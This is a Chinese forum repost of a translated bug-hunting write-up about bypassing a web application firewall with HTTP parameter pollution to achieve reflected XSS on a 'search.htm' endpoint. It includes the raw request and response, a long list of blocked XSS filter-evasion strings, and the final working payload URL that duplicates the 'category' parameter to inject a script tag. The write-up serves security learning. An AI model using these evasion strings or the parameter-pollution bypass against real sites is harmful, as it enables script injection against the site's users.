原文链接:通过HTTP参数污染绕过XSS
HTTP参数污染通过注入查询字符串分隔符来覆盖或添加HTTP GET / POST参数。基本上,攻击者多次发送相同的参数来影响应用程序。通过指定新的随机参数并将其添加到请求中,也可以利用此方法。服务器可以合并重复参数的值,也可以拒绝两个值之一。下表总结了不同Web服务器中的已知行为:
要求最近,我正在研究一个xss脚本执行的应用程序,因为它可以注入<, >, ",;, etc...。,但是(Web应用程序防火墙/黑名单)会删除HTML标签和属性。该漏洞位于“ category” POST请求中发送给“ search.htm”的参数中:
- POST /search.htm HTTP/1.1
- User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/18.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 109
- category=
只要将任何类型的HTML标记提供给该category参数,应用程序就会将用户重定向到引用somesite的错误页面: - HTTP/1.1 302 Moved Temporarily
- Date: Tue, 03 Sep 2013 02:12:58 GMT
- Server: Apache-Coyote/1.1
- X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA/Tomcat-5.5
- Content-Length: 0
- Location: https://www.somesite.com/error.html?code=OWASP
- Connection: keep-alive
- Content-Type: text/html; charset=UTF-8
POST to GET
只需将请求从a更改POST为a GET 就可以。不幸的是,更改请求无效。但是,应用程序支持它,这样利用变得更加容易。
传统绕道
首先,我尝试不同的参数来fuzz测试标准的过滤器规避技术。这是所有被阻止的列表:
- "onclick
- "ondblclick
- "onmousedown
- "onmousemove
- "onmouseover
- "onmouseout
- "onmouseup
- "onkeydown
- "onkeypress
- "onkeyup
- "onabort
- "onerror
- "onload
- "onresize
- "onscroll
- "onunload
- "onsubmit
- "onblur
- "onchange
- "onfocus
- "onreset
- "onselect
- “><ScRiPt>
- “><SCRIPT>
- “><script//
- “><script/**/
- “><script+
- “><script%20
- “><script
- “><%73%63%72%69%70%74>
- “><<script>>
- “><s/**/c/**/r/**/i/**/p/**/t>
- “><s//c//r//i//p//t>
- “><s+c+r+i+p+t>
- “><s%20c%20r%20i%20p%20t>
- “><%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74>
- <object
- <div
- <img
- <a
HPPBYPASS
你可能已经猜到了,只需简单地指定category两次参数,就可以完全绕开防火墙。防火墙忽略了参数的第二个实例,然后在服务器上将两个参数组合在一起,从而允许脚本插入!
形成网址:
- search.htm?category=&category=”><script>alert(‘reflected%20xss’)</script>
| 
发表于 2020-4-20 20:16:57